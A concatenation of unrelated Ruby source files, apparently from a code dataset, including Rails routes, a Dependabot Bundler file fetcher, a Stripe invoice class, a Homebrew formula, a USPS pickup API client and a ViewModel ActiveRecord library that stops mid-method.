Rails.application.routes.draw do
root to: "projects#index"
# Sidekiq
authenticate :user, lambda { |u| u.admin? } do
mount Sidekiq::Web => "/sidekiq"
end
# ActionCable
mount ActionCable.server => "/cable"
# Auth
devise_for :users, controllers: { invitations: "users/invitations" }, skip: [:registrations, :sessions]
as :user do
get "users/edit" => "users/registrations#edit", :as => "edit_user_registration"
get "users/edit_avatar" => "users/registrations#edit_avatar", :as => "edit_user_avatar"
post "users/update_avatar" => "users/registrations#update_avatar", :as => "update_user_avatar"
post "users" => "users/registrations#update", :as => "user_registration"
get "signin", to: "devise/sessions#new", as: :new_user_session
post "signin", to: "devise/sessions#create", as: :user_session
delete "signout", to: "devise/sessions#destroy", as: :destroy_user_session
end
# Resources
resources :projects, except: [:destroy], shallow: true do
member do
post "archive"
post "unarchive"
end
resources :membership, only: [:destroy] do
member do
post "promote"
post "demote"
post "reinvite"
end
end
resources :sessions do
member do
post "upload/:asset_type", to: "sessions#upload", as: :upload_asset_to
get "tab/:tab", to: "sessions#show", as: :tab, constraints: { tab: /(photos|consent_forms|data_points)/ }
end
resources :data_points, except: [:index] do
member do
post "bookmark"
post "unbookmark"
end
end
resources :consent_forms, except: [:new]
resources :photos, only: [:show, :destroy] do
get "download", on: :member
end
end
end
resources :projects, only: [] do
resources :members, only: [:index, :show]
end
end
| 28.953846 | 113 | 0.63762 |
bf6b43efb90871587b9b2681069c3caca121df45 | 7,193 | # frozen_string_literal: true
require "dependabot/file_fetchers"
require "dependabot/file_fetchers/base"
require "dependabot/bundler/file_updater/lockfile_updater"
require "dependabot/errors"
module Dependabot
module Bundler
class FileFetcher < Dependabot::FileFetchers::Base
require "dependabot/bundler/file_fetcher/gemspec_finder"
require "dependabot/bundler/file_fetcher/path_gemspec_finder"
require "dependabot/bundler/file_fetcher/child_gemfile_finder"
require "dependabot/bundler/file_fetcher/require_relative_finder"
def self.required_files_in?(filenames)
return true if filenames.any? { |name| name.match?(%r{^[^/]*\.gemspec$}) }
filenames.include?("Gemfile") || filenames.include?("gems.rb")
end
def self.required_files_message
"Repo must contain either a Gemfile, a gemspec, or a gems.rb."
end
private
def fetch_files
fetched_files = []
fetched_files << gemfile if gemfile
fetched_files << lockfile if gemfile && lockfile
fetched_files += child_gemfiles
fetched_files += gemspecs
fetched_files << ruby_version_file if ruby_version_file
fetched_files += path_gemspecs
fetched_files += require_relative_files(fetched_files)
fetched_files = uniq_files(fetched_files)
check_required_files_present
unless self.class.required_files_in?(fetched_files.map(&:name))
raise "Invalid set of files: #{fetched_files.map(&:name)}"
end
fetched_files
end
def uniq_files(fetched_files)
uniq_files = fetched_files.reject(&:support_file?).uniq
uniq_files += fetched_files.
reject { |f| uniq_files.map(&:name).include?(f.name) }
end
def check_required_files_present
return if gemfile || gemspecs.any?
path = Pathname.new(File.join(directory, "Gemfile")).
cleanpath.to_path
raise Dependabot::DependencyFileNotFound, path
end
def gemfile
@gemfile ||= fetch_file_if_present("gems.rb") ||
fetch_file_if_present("Gemfile")
end
def lockfile
@lockfile ||= fetch_file_if_present("gems.locked") ||
fetch_file_if_present("Gemfile.lock")
end
def gemspecs
return @gemspecs if defined?(@gemspecs)
gemspecs_paths =
gemspec_directories.
flat_map do |d|
repo_contents(dir: d).
select { |f| f.name.end_with?(".gemspec") }.
map { |f| File.join(d, f.name) }
end
@gemspecs = gemspecs_paths.map { |n| fetch_file_from_host(n) }
rescue Octokit::NotFound
[]
end
def gemspec_directories
gemfiles = ([gemfile] + child_gemfiles).compact
directories =
gemfiles.flat_map do |file|
GemspecFinder.new(gemfile: file).gemspec_directories
end.uniq
directories.empty? ? ["."] : directories
end
def ruby_version_file
return unless gemfile
return unless gemfile.content.include?(".ruby-version")
@ruby_version_file ||=
fetch_file_if_present(".ruby-version")&.
tap { |f| f.support_file = true }
end
def path_gemspecs
gemspec_files = []
unfetchable_gems = []
path_gemspec_paths.each do |path|
# Get any gemspecs at the path itself
gemspecs_at_path = fetch_gemspecs_from_directory(path)
# Get any gemspecs nested one level deeper
nested_directories =
repo_contents(dir: path).
select { |f| f.type == "dir" }
nested_directories.each do |dir|
dir_path = File.join(path, dir.name)
gemspecs_at_path += fetch_gemspecs_from_directory(dir_path)
end
# Add the fetched gemspecs to the main array, and note an error if
# none were found for this path
gemspec_files += gemspecs_at_path
unfetchable_gems << path.basename.to_s if gemspecs_at_path.empty?
rescue Octokit::NotFound, Gitlab::Error::NotFound
unfetchable_gems << path.basename.to_s
end
raise Dependabot::PathDependenciesNotReachable, unfetchable_gems if unfetchable_gems.any?
gemspec_files.tap { |ar| ar.each { |f| f.support_file = true } }
end
def path_gemspec_paths
fetch_path_gemspec_paths.map { |path| Pathname.new(path) }
end
def require_relative_files(files)
ruby_files =
files.select { |f| f.name.end_with?(".rb", "Gemfile", ".gemspec") }
paths = ruby_files.flat_map do |file|
RequireRelativeFinder.new(file: file).require_relative_paths
end
@require_relative_files ||=
paths.map { |path| fetch_file_from_host(path) }.
tap { |req_files| req_files.each { |f| f.support_file = true } }
end
def fetch_gemspecs_from_directory(dir_path)
repo_contents(dir: dir_path, fetch_submodules: true).
select { |f| f.name.end_with?(".gemspec", ".specification") }.
map { |f| File.join(dir_path, f.name) }.
map { |fp| fetch_file_from_host(fp, fetch_submodules: true) }
end
def fetch_path_gemspec_paths
if lockfile
parsed_lockfile = ::Bundler::LockfileParser.
new(sanitized_lockfile_content)
parsed_lockfile.specs.
select { |s| s.source.instance_of?(::Bundler::Source::Path) }.
map { |s| s.source.path }.uniq
else
gemfiles = ([gemfile] + child_gemfiles).compact
gemfiles.flat_map do |file|
PathGemspecFinder.new(gemfile: file).path_gemspec_paths
end.uniq
end
rescue ::Bundler::LockfileError
raise Dependabot::DependencyFileNotParseable, lockfile.path
rescue ::Bundler::Plugin::UnknownSourceError
# Quietly ignore plugin errors - we'll raise a better error during
# parsing
[]
end
def child_gemfiles
return [] unless gemfile
@child_gemfiles ||=
fetch_child_gemfiles(file: gemfile, previously_fetched_files: [])
end
# TODO: Stop sanitizing the lockfile once we have bundler 2 installed
def sanitized_lockfile_content
regex = FileUpdater::LockfileUpdater::LOCKFILE_ENDING
lockfile.content.gsub(regex, "")
end
def fetch_child_gemfiles(file:, previously_fetched_files:)
paths = ChildGemfileFinder.new(gemfile: file).child_gemfile_paths
paths.flat_map do |path|
next if previously_fetched_files.map(&:name).include?(path)
next if file.name == path
fetched_file = fetch_file_from_host(path)
grandchild_gemfiles = fetch_child_gemfiles(
file: fetched_file,
previously_fetched_files: previously_fetched_files + [file]
)
[fetched_file, *grandchild_gemfiles]
end.compact
end
end
end
end
Dependabot::FileFetchers.register("bundler", Dependabot::Bundler::FileFetcher)
| 33.147465 | 97 | 0.633533 |
03df40879f1a6ad67a8a4518443ab18ff9319875 | 721 | # frozen_string_literal: true
require 'rails_helper'
describe Agent do
subject { build(:agent, :with_complete_metadata, aliases: [agent_alias]) }
let(:agent_alias) { build(:alias) }
describe '#given_name' do
its(:given_name) { is_expected.to eq('Johnny C.') }
end
describe '#sur_name' do
its(:sur_name) { is_expected.to eq('Lately') }
end
describe '#aliases' do
its(:aliases) { is_expected.to contain_exactly(agent_alias) }
end
describe '#psu_id' do
its(:psu_id) { is_expected.to eq('jcl81') }
end
describe '#email' do
its(:email) { is_expected.to eq('[email protected]') }
end
describe '#orcid_id' do
its(:orcid_id) { is_expected.to eq('00123445') }
end
end
| 21.205882 | 76 | 0.669903 |
3359087bfb0351b37ee1e53ec17111f4e93e4e45 | 607 | module Stripe
class Invoice < APIResource
include Stripe::APIOperations::List
include Stripe::APIOperations::Update
include Stripe::APIOperations::Create
def self.upcoming(params, api_key = nil)
response, api_key = Stripe.request(:get, upcoming_url, api_key, params)
Util.convert_to_stripe_object(response, api_key)
end
def pay
response, api_key = Stripe.request(:post, pay_url, @api_key)
refresh_from(response, api_key)
end
private
def self.upcoming_url
url + '/upcoming'
end
def pay_url
url + '/pay'
end
end
end
| 21.678571 | 77 | 0.673806 |
ffcc1f2f02f29fdb846053ba6586fa068088c491 | 693 | require "m2config"
include M2Config
cfg = M2Config::Config.new
server = M2Config::Server.new
exComHost = M2Config::Host.new({matching:"example.com", name:"ex"})
pubDir = M2Config::Dir.new({base:"public/",default_ctype: "text/html"})
pubRoute = M2Config::Route.new( {path:"/", target:pubDir} )
appHand = M2Config::Handler.new({ send_spec:"tcp://10.0.0.1:8989",
recv_spec:"tcp://10.0.0.1:9898",
send_ident: "dev.example.com ID" })
appRoute = M2Config::Route.new( {path:"/blog", target:appHand} )
exComHost.add_route appRoute
exComHost.add_route pubRoute
cfg["extra"] = 64
server.add_host exComHost
| 33 | 74 | 0.626263 |
5d265420cd219978420169a580fdab543abae611 | 1,447 | class Liboil < Formula
desc "C library of simple functions optimized for various CPUs"
homepage "http://liboil.freedesktop.org/"
url "http://liboil.freedesktop.org/download/liboil-0.3.17.tar.gz"
sha256 "105f02079b0b50034c759db34b473ecb5704ffa20a5486b60a8b7698128bfc69"
bottle do
cellar :any
revision 1
sha256 "7d76b7a220caeb8dbaef27b879f4f3ac0ad5b236b563961abd9484e8bc9e0160" => :el_capitan
sha1 "1d7f799090d7ccfe52341971822d3af1269ea68f" => :yosemite
sha1 "14d746548dc6e18f900e4fe67d1f1958fda68016" => :mavericks
sha1 "41590a673b637d2307b1ce287ec692e4d47b3191" => :mountain_lion
end
depends_on "pkg-config" => :build
depends_on "autoconf" => :build
depends_on "automake" => :build
depends_on "libtool" => :build
def install
ENV.append "CFLAGS", "-fheinous-gnu-extensions" if ENV.compiler == :clang
system "autoreconf", "-fvi"
system "./configure", "--disable-dependency-tracking",
"--disable-silent-rules",
"--prefix=#{prefix}"
system "make"
system "make", "install"
end
test do
(testpath/"test.c").write <<-EOS.undent
#include <liboil/liboil.h>
int main(int argc, char** argv) {
oil_init();
return 0;
}
EOS
flags = ["-I#{include}/liboil-0.3", "-L#{lib}", "-loil-0.3"] + ENV.cflags.to_s.split
system ENV.cc, "test.c", "-o", "test", *flags
system "./test"
end
end
| 32.155556 | 92 | 0.657913 |
1cf18fb57e67b86d44e5618ecafe5925babe8f1a | 8,791 | # frozen_string_literal: true
# This file was auto-generated by lib/tasks/api.rake
module Usps
module Api
module Endpoints
module CarrierPickupSchedule
# The Package Pickup Schedule API schedules a
# Package Pickup and provides the user a confirmation number for the scheduled
# pickup. Prior to making a Pickup Schedule call, it is recommended to use
# the Pickup Availability API to confirm that service is available.
# @param [Hash] options
# @option options [required, Hash] carrier_pickup_schedule_request
# * *:first_name* (required, String) — Only alpha characters, apostrophes, spaces, periods, and hyphens "-" may be used. For example: <FirstName>John</FirstName>
# * *:last_name* (required, String) — Only alpha characters, apostrophes, spaces, periods and hyphens "-" may be used. For example: <LastName>Doe</LastName>
# * *:firm_name* (String) — Only alpha and numeric characters, apostrophes, spaces, hyphens "-" and ampersands "&" may be used. Use this tag for a firm or company name. Some firms/companies that have their own ZIP codes require the use of firm name to properly identify their address. Note: FirmName is Optional except if the First Name and Last Name tags are null. For example: <FirmName>ABC Company</FirmName>
# * *:suite_or_apt* (required, String) — Apartment or suite number. Optional except if needed to uniquely identify an address at a multiple dwelling address, for example, an apartment building. For example: <SuiteOrApt>Suite 777</SuiteOrApt>
# * *:address2* (required, String) — Street address. For example: <Address2>1390 Market Street</Address2>
# * *:urbanization* (required, String) — Use this tag for Urbanization (for Puerto Rico only). ZIP Code prefixes 006 to 009, if area is so designated.
# * *:city* (required, String) — City name. Either ZIP5 or City and State are required. For example: <City>Houston</City>
# * *:state* (required, String) — State abbreviation. Either ZIP5 or City and State are required. For example: <State>TX</State>
# * *:zip5* (required, String) — 5-digit ZIP Code. Either ZIP5 or City and State are required. For example: <ZIP5>77058</ZIP5>
# * *:zip4* (required, String) — Use this tag for a 4 digit ZIP Code. For example: <ZIP4>1234</ZIP4>
# * *:phone* (required, String) — Two formats are allowed: (###) 123-4567 or ###-123-4567. For example: <Phone>5555551234</Phone> or <Phone>555-555-1234</Phone>
# * *:extension* (String) — Optional value for Phone Extension. For example: <Extension>201</Extension>
# * *:package* (required, Hash) — No values entered with this tag. <ServiceType> and <Count> tags are embedded under this. Refer to the XML request example section, below, to see how these embedded tags are formatted. If the <Count> for a service type is zero, you do not need to encode a <Package> but you must have at least one <Package> with embedded <ServiceType> and <Count> tags.
# * *:service_type* (required, String) — This tag is embedded under the <Package> tag. If your pickup contains more than one Service Type, use additional <Package> tags for each service type with the accompanying <ServiceType> and <Count> tags. Refer to the XML Request Example below to see how these embedded tags are formatted. For example: <ServiceType>PriorityMailExpress</ServiceType>
# * *:count* (required, String) — This tag is embedded under the <Package> tag. Enter the number of packages for the accompanying <ServiceType> tag. Maximum characters allowed: 3 or 999 packages. If your pickup contains more than one Service Type, use additional <Package> tags for each service type with the accompanying <ServiceType> and <Count> tags. Refer to the XML request example section, below, to see how these embedded tags are formatted. For example: <Count>2</Count>
# * *:estimated_weight* (required, String) — Enter the estimated aggregate weight (in pounds) of all packages being picked up. For example: <EstimatedWeight>14</EstimatedWeight>
# * *:package_location* (required, String) — Enter one of the following values: Note: "Other" requires information in the value for the <SpecialInstructions> tag. For example: <PackageLocation>Front Door</PackageLocation>
# * *:special_instructions* (String) — Value Required when PackageLocation is “Other”. Only alpha, numeric, commas, periods, apostrophes, _, &, -, ( ), ?, #, / +, @ and space characters may be used. For example: <SpecialInstructions>Packages are behind the screen door.</SpecialInstructions>
# * *:email_address* (String) — If provided, email notifications will be sent confirming package pickup, or request changes and cancellations. Maximum characters allowed: 50. For example: <EmailAddress>[email protected]</EmailAddress>
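        # A hypothetical invocation (illustrative values only; the client setup and
        # field values are assumptions, field names follow the documentation above):
        #
        #   client.carrier_pickup_schedule(
        #     carrier_pickup_schedule_request: {
        #       first_name: 'John', last_name: 'Doe',
        #       suite_or_apt: '', address2: '1390 Market Street',
        #       urbanization: '', city: 'Houston', state: 'TX',
        #       zip5: '77058', zip4: '', phone: '555-555-1234',
        #       package: { service_type: 'PriorityMailExpress', count: '2' },
        #       estimated_weight: '14', package_location: 'Front Door'
        #     }
        #   )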
def carrier_pickup_schedule(options = {})
          raise ArgumentError.new('Required arguments :carrier_pickup_schedule_request missing') if options[:carrier_pickup_schedule_request].nil?
          raise ArgumentError.new('Required arguments :carrier_pickup_schedule_request, :first_name missing') if options[:carrier_pickup_schedule_request][:first_name].nil?
          raise ArgumentError.new('Required arguments :carrier_pickup_schedule_request, :last_name missing') if options[:carrier_pickup_schedule_request][:last_name].nil?
          raise ArgumentError.new('Required arguments :carrier_pickup_schedule_request, :address2 missing') if options[:carrier_pickup_schedule_request][:address2].nil?
          raise ArgumentError.new('Required arguments :carrier_pickup_schedule_request, :city missing') if options[:carrier_pickup_schedule_request][:city].nil?
          raise ArgumentError.new('Required arguments :carrier_pickup_schedule_request, :state missing') if options[:carrier_pickup_schedule_request][:state].nil?
          raise ArgumentError.new('Required arguments :carrier_pickup_schedule_request, :zip5 missing') if options[:carrier_pickup_schedule_request][:zip5].nil?
          raise ArgumentError.new('Required arguments :carrier_pickup_schedule_request, :phone missing') if options[:carrier_pickup_schedule_request][:phone].nil?
          raise ArgumentError.new('Required arguments :carrier_pickup_schedule_request, :package missing') if options[:carrier_pickup_schedule_request][:package].nil?
          raise ArgumentError.new('Required arguments :carrier_pickup_schedule_request, :package, :service_type missing') if options[:carrier_pickup_schedule_request][:package][:service_type].nil?
          raise ArgumentError.new('Required arguments :carrier_pickup_schedule_request, :package, :count missing') if options[:carrier_pickup_schedule_request][:package][:count].nil?
request = build_request(:carrier_pickup_schedule, options)
get('https://secure.shippingapis.com/ShippingAPI.dll', {
API: 'CarrierPickupSchedule',
XML: request,
})
end
private
def tag_unless_blank(xml, tag_name, data)
xml.tag!(tag_name, data) unless data.blank? || data.nil?
end
def build_carrier_pickup_schedule_request(xml, options = {})
xml.tag!('FirstName', options[:carrier_pickup_schedule_request][:first_name])
xml.tag!('LastName', options[:carrier_pickup_schedule_request][:last_name])
tag_unless_blank(xml, 'FirmName', options[:carrier_pickup_schedule_request][:firm_name])
xml.tag!('SuiteOrApt', options[:carrier_pickup_schedule_request][:suite_or_apt])
xml.tag!('Address2', options[:carrier_pickup_schedule_request][:address2])
xml.tag!('Urbanization', options[:carrier_pickup_schedule_request][:urbanization])
xml.tag!('City', options[:carrier_pickup_schedule_request][:city])
xml.tag!('State', options[:carrier_pickup_schedule_request][:state])
xml.tag!('ZIP5', options[:carrier_pickup_schedule_request][:zip5])
xml.tag!('ZIP4', options[:carrier_pickup_schedule_request][:zip4])
xml.tag!('Phone', options[:carrier_pickup_schedule_request][:phone])
tag_unless_blank(xml, 'Extension', options[:carrier_pickup_schedule_request][:extension])
if options[:carrier_pickup_schedule_request][:packages]
options[:carrier_pickup_schedule_request][:packages].each do |pkg|
xml.tag!('Package') do
xml.tag!('ServiceType', pkg[:service_type])
xml.tag!('Count', pkg[:count])
end
end
end
xml.tag!('EstimatedWeight', options[:carrier_pickup_schedule_request][:estimated_weight])
xml.tag!('PackageLocation', options[:carrier_pickup_schedule_request][:package_location])
tag_unless_blank(xml, 'SpecialInstructions', options[:carrier_pickup_schedule_request][:special_instructions])
tag_unless_blank(xml, 'EmailAddress', options[:carrier_pickup_schedule_request][:email_address])
xml.target!
end
end
end
end
end
| 89.704082 | 485 | 0.747014 |
e89dfb49bfd2540672cb71e16667b5afbdf1e97c | 1,239 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'combine_pdf/version'
Gem::Specification.new do |spec|
spec.name = "combine_pdf"
spec.version = CombinePDF::VERSION
spec.authors = ["Boaz Segev"]
spec.email = ["[email protected]"]
spec.summary = %q{Combine, stamp and watermark PDF files in pure Ruby.}
  spec.description   = %q{A nifty gem, in pure Ruby, to parse PDF files and combine (merge) them with other PDF files, number the pages, watermark them or stamp them, create tables, add basic text objects etc. (all using the PDF file format).}
spec.homepage = "https://github.com/boazsegev/combine_pdf"
spec.license = "MIT"
spec.files = `git ls-files -z`.split("\x0")
spec.executables = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
spec.test_files = spec.files.grep(%r{^(test|spec|features)/})
spec.require_paths = ["lib"]
spec.add_runtime_dependency 'ruby-rc4', '>= 0.1.5'
spec.add_runtime_dependency 'matrix'
# spec.add_development_dependency "bundler", ">= 1.7"
spec.add_development_dependency "rake", ">= 12.3.3"
spec.add_development_dependency "minitest"
end
| 44.25 | 243 | 0.677159 |
1cd2c74c58d189c8d0b4c13cdabd03ec56e88708 | 110 | <% module_namespacing do -%>
class <%= class_name.pluralize %>Controller < ResourcesController
end
<% end -%>
| 22 | 65 | 0.718182 |
01b2b83c06c1377383674cf4919341d32422d6c9 | 4,140 | # frozen_string_literal: true
module Meals
class MealDecorator < ApplicationDecorator
delegate_all
def title_or_no_title
title || "[No Menu]"
end
def link(*url_args)
h.link_to(title_or_no_title, h.meal_url(object, *url_args))
end
def form_section(section, **options, &block)
Meals::FormSection.new(self, section, **options, &block).html
end
def current_signup
@current_signup ||= signups.detect { |s| s.household_id == h.current_user.household_id }&.decorate
end
def css_classes(highlight_signup: true)
if cancelled?
"cancelled"
elsif highlight_signup && current_signup.present?
"signed-up"
else
""
end
end
def auto_close_time_soon?
open? && auto_close_time.present? &&
auto_close_time > Time.current && auto_close_time - Time.current < 1.day
end
def closing_soon_pill
safe_str << nbsp <<
h.link_to("Closes Soon!", h.meal_path(object), class: "pill pill-emphasis pill-small")
end
def nonempty_menu_items
Meals::Meal::MENU_ITEMS.map { |i| [i, self[i]] }.to_h.reject { |_, t| t.blank? }
end
    # Returns a non-persisted Signup with this meal. Used for SignupPolicy checks.
def sample_signup
@sample_signup ||= Signup.new(meal: object)
end
def location_name
return @location_name if defined?(@location_name)
@location_name = calendars.first&.decorate&.name_with_prefix
end
def location_name_with_at
location_name.nil? ? nil : " at #{location_name}"
end
def location_abbrv
calendars.first&.decorate&.abbrv_with_prefix
end
def served_at_datetime
l(served_at)
end
def served_at_time_only
l(served_at, format: :time_only)
end
def served_at_lens_dependent(time_lens)
format = time_lens.upcoming? ? :wday_no_year : :default
l(served_at, format: format)
end
def served_at_wday_no_year
l(served_at, format: :wday_no_year)
end
def served_on_no_yr
l(served_at.to_date, format: :wday_no_year)
end
# We should disable the "own" community checkbox for most users.
def disable_community_checkbox?(community)
disable = (object.community == community && community_invited?(community))
disable ? "disabled" : nil
end
def cost
@cost ||= object.cost.decorate
end
def allergen_options
(community.settings.meals.allergens.split(/\s*,\s*/) + allergens).uniq.sort
end
def worker_links_for_role(role)
assignments = assignments_by_role[role] || []
links = assignments.map { |a| a.user.decorate.link(highlight: h.lenses[:user].value) }
links.present? ? h.safe_join(links, ", ") : h.content_tag(:span, "[None]", class: "weak")
end
def takeout_allowed?
formula.takeout?
end
def show_action_link_set
ActionLinkSet.new(
ActionLink.new(object, :edit, icon: "pencil", path: h.edit_meal_path(object)),
ActionLink.new(object, :summary, icon: "file-text", path: h.summary_meal_path(object)),
ActionLink.new(object, :reopen, icon: "unlock", path: h.reopen_meal_path(object),
method: :put, confirm: true),
ActionLink.new(object, :close, icon: "lock", path: h.close_meal_path(object),
method: :put, confirm: true),
ActionLink.new(object, :finalize, icon: "certificate", path: h.new_meal_finalize_path(object)),
ActionLink.new(object, :cancel, icon: "ban", path: h.new_meal_message_path(object, cancel: 1)),
ActionLink.new(object, :send_message, icon: "envelope", path: h.new_meal_message_path(object))
)
end
def edit_action_link_set
ActionLinkSet.new(
ActionLink.new(object, :destroy, icon: "trash", path: h.meal_path(object), method: :delete,
confirm: {title: title_or_no_title})
)
end
private
def form_section_summarizer
@form_section_summarizer ||= Meals::FormSectionSummarizer.new(self)
end
end
end
| 30 | 104 | 0.646377 |
39af711b64223f71314c64ab1fb1e9284b139021 | 15,853 | # frozen_string_literal: true
require 'active_support'
require 'active_record'
require 'view_model'
require 'view_model/record'
require 'lazily'
require 'concurrent'
class ViewModel::ActiveRecord < ViewModel::Record
# Defined before requiring components so components can refer to them at parse time
# for functional updates
FUNCTIONAL_UPDATE_TYPE = '_update'
ACTIONS_ATTRIBUTE = 'actions'
VALUES_ATTRIBUTE = 'values'
BEFORE_ATTRIBUTE = 'before'
AFTER_ATTRIBUTE = 'after'
require 'view_model/utils/collections'
require 'view_model/active_record/association_data'
require 'view_model/active_record/update_data'
require 'view_model/active_record/update_context'
require 'view_model/active_record/update_operation'
require 'view_model/active_record/visitor'
require 'view_model/active_record/cloner'
require 'view_model/active_record/cache'
require 'view_model/active_record/association_manipulation'
include AssociationManipulation
attr_reader :changed_associations
class << self
attr_reader :_list_attribute_name
delegate :transaction, to: :model_class
# Specifies that the model backing this viewmodel is a member of an
# `acts_as_manual_list` collection.
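    # e.g. (illustrative): a list-member viewmodel might declare `acts_as_list :position`.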
def acts_as_list(attr = :position)
@_list_attribute_name = attr
@generated_accessor_module.module_eval do
define_method('_list_attribute') do
model.public_send(attr)
end
define_method('_list_attribute=') do |x|
model.public_send(:"#{attr}=", x)
end
end
end
def _list_member?
_list_attribute_name.present?
end
# Adds an association from the model to this viewmodel. The associated model
# will be recursively (de)serialized by its own viewmodel type, which will
# be inferred from the model name, or may be explicitly specified.
#
# An association to a root viewmodel type will be serialized with an
# indirect reference, while a child viewmodel type will be directly nested.
#
# - +as+ sets the name of the association in the viewmodel
#
# - +viewmodel+, +viewmodels+ specifies the viewmodel(s) to use for the
# association
#
# - +external+ indicates an association external to the view. Externalized
# associations are not included in (de)serializations of the parent, and
# must be independently manipulated using `AssociationManipulation`.
# External associations may only be made to root viewmodels.
#
# - +through+ names an ActiveRecord association that will be used like an
# ActiveRecord +has_many:through:+.
#
    # - +through_order_attr+ orders the through models by the given attribute
    #   (only applies when +through+ is set).
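    #
    # A hypothetical illustration of the options above (view and association
    # names are invented for the example):
    #
    #   association :sections                          # nested child views
    #   association :author, viewmodel: PersonView     # explicit viewmodel class
    #   association :tags, through: :post_tags, through_order_attr: :position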
def association(association_name,
as: nil,
viewmodel: nil,
viewmodels: nil,
external: false,
read_only: false,
through: nil,
through_order_attr: nil)
vm_association_name = (as || association_name).to_s
if through
direct_association_name = through
indirect_association_name = association_name
else
direct_association_name = association_name
indirect_association_name = nil
end
target_viewmodels = Array.wrap(viewmodel || viewmodels)
association_data = AssociationData.new(
owner: self,
association_name: vm_association_name,
direct_association_name: direct_association_name,
indirect_association_name: indirect_association_name,
target_viewmodels: target_viewmodels,
external: external,
read_only: read_only,
through_order_attr: through_order_attr)
_members[vm_association_name] = association_data
@generated_accessor_module.module_eval do
define_method vm_association_name do
_read_association(vm_association_name)
end
define_method :"serialize_#{vm_association_name}" do |json, serialize_context: self.class.new_serialize_context|
_serialize_association(vm_association_name, json, serialize_context: serialize_context)
end
end
end
# Specify multiple associations at once
def associations(*assocs, **args)
assocs.each { |assoc| association(assoc, **args) }
end
## Load instances of the viewmodel by id(s)
def find(id_or_ids, scope: nil, lock: nil, eager_include: true)
find_scope = self.model_class.all
find_scope = find_scope.order(:id).lock(lock) if lock
find_scope = find_scope.merge(scope) if scope
ViewModel::Utils.wrap_one_or_many(id_or_ids) do |ids|
models = find_scope.where(id: ids).to_a
if models.size < ids.size
missing_ids = ids - models.map(&:id)
if missing_ids.present?
raise ViewModel::DeserializationError::NotFound.new(
missing_ids.map { |id| ViewModel::Reference.new(self, id) })
end
end
vms = models.map { |m| self.new(m) }
ViewModel.preload_for_serialization(vms, lock: lock) if eager_include
vms
end
end
## Load instances of the viewmodel by scope
    ## TODO: is this too much of an encapsulation violation?
def load(scope: nil, eager_include: true, lock: nil)
load_scope = self.model_class.all
load_scope = load_scope.lock(lock) if lock
load_scope = load_scope.merge(scope) if scope
vms = load_scope.map { |model| self.new(model) }
ViewModel.preload_for_serialization(vms, lock: lock) if eager_include
vms
end
def deserialize_from_view(subtree_hash_or_hashes, references: {}, deserialize_context: new_deserialize_context)
model_class.transaction do
ViewModel::Utils.wrap_one_or_many(subtree_hash_or_hashes) do |subtree_hashes|
root_update_data, referenced_update_data = UpdateData.parse_hashes(subtree_hashes, references)
_updated_viewmodels =
UpdateContext
.build!(root_update_data, referenced_update_data, root_type: self)
.run!(deserialize_context: deserialize_context)
end
end
end
# Constructs a preload specification of the required models for
# serializing/deserializing this view. Cycles in the schema will be broken
# after two layers of eager loading.
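    #
    # The returned DeepPreloader::Spec is keyed by the direct ActiveRecord
    # association names; as a purely illustrative sketch of the shape:
    #
    #   DeepPreloader::Spec.new(
    #     "sections" => DeepPreloader::Spec.new(...),
    #     "author"   => nil  # e.g. a referenced root when include_referenced is false
    #   )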
def eager_includes(include_referenced: true, vm_path: [])
association_specs = {}
return nil if vm_path.count(self) > 2
child_path = vm_path + [self]
_members.each do |assoc_name, association_data|
next unless association_data.is_a?(AssociationData)
next if association_data.external?
case
when association_data.through?
viewmodel = association_data.direct_viewmodel
children = viewmodel.eager_includes(include_referenced: include_referenced, vm_path: child_path)
when !include_referenced && association_data.referenced?
children = nil # Load up to the root viewmodel, but no further
when association_data.polymorphic?
children_by_klass = {}
association_data.viewmodel_classes.each do |vm_class|
klass = vm_class.model_class.name
children_by_klass[klass] = vm_class.eager_includes(include_referenced: include_referenced, vm_path: child_path)
end
children = DeepPreloader::PolymorphicSpec.new(children_by_klass)
else
viewmodel = association_data.viewmodel_class
children = viewmodel.eager_includes(include_referenced: include_referenced, vm_path: child_path)
end
association_specs[association_data.direct_reflection.name.to_s] = children
end
DeepPreloader::Spec.new(association_specs)
end
def dependent_viewmodels(seen = Set.new, include_referenced: true, include_external: true)
return if seen.include?(self)
seen << self
_members.each_value do |data|
next unless data.is_a?(AssociationData)
next unless include_referenced || !data.referenced?
next unless include_external || !data.external?
data.viewmodel_classes.each do |vm|
vm.dependent_viewmodels(seen, include_referenced: include_referenced, include_external: include_external)
end
end
seen
end
def deep_schema_version(include_referenced: true, include_external: true)
(@deep_schema_version ||= {})[[include_referenced, include_external]] ||=
begin
vms = dependent_viewmodels(include_referenced: include_referenced, include_external: include_external)
ViewModel.schema_versions(vms).freeze
end
end
def cacheable!(**opts)
include ViewModel::ActiveRecord::Cache::CacheableView
create_viewmodel_cache!(**opts)
end
# internal
def _association_data(association_name)
association_data = self._members[association_name.to_s]
raise ArgumentError.new("Invalid association '#{association_name}'") unless association_data.is_a?(AssociationData)
association_data
end
end
def initialize(*)
super
model_is_new! if model.new_record?
@changed_associations = []
end
def serialize_members(json, serialize_context: self.class.new_serialize_context)
self.class._members.each do |member_name, member_data|
next if member_data.association? && member_data.external?
member_context =
case member_data
when AssociationData
self.context_for_child(member_name, context: serialize_context)
else
serialize_context
end
self.public_send("serialize_#{member_name}", json, serialize_context: member_context)
end
end
def destroy!(deserialize_context: self.class.new_deserialize_context)
model_class.transaction do
ViewModel::Callbacks.wrap_deserialize(self, deserialize_context: deserialize_context) do |hook_control|
changes = ViewModel::Changes.new(deleted: true)
deserialize_context.run_callback(ViewModel::Callbacks::Hook::OnChange, self, changes: changes)
hook_control.record_changes(changes)
model.destroy!
end
end
end
def association_changed!(association_name)
association_name = association_name.to_s
association_data = self.class._association_data(association_name)
if association_data.read_only?
raise ViewModel::DeserializationError::ReadOnlyAssociation.new(association_name, blame_reference)
end
unless @changed_associations.include?(association_name)
@changed_associations << association_name
end
end
def associations_changed?
@changed_associations.present?
end
# Additionally pass `changed_associations` while constructing changes.
def changes
ViewModel::Changes.new(
new: new_model?,
changed_attributes: changed_attributes,
changed_associations: changed_associations,
changed_nested_children: changed_nested_children?,
changed_referenced_children: changed_referenced_children?,
)
end
def clear_changes!
super.tap do
@changed_associations = []
end
end
def _read_association(association_name)
association_data = self.class._association_data(association_name)
associated = model.public_send(association_data.direct_reflection.name)
return nil if associated.nil?
case
when association_data.through?
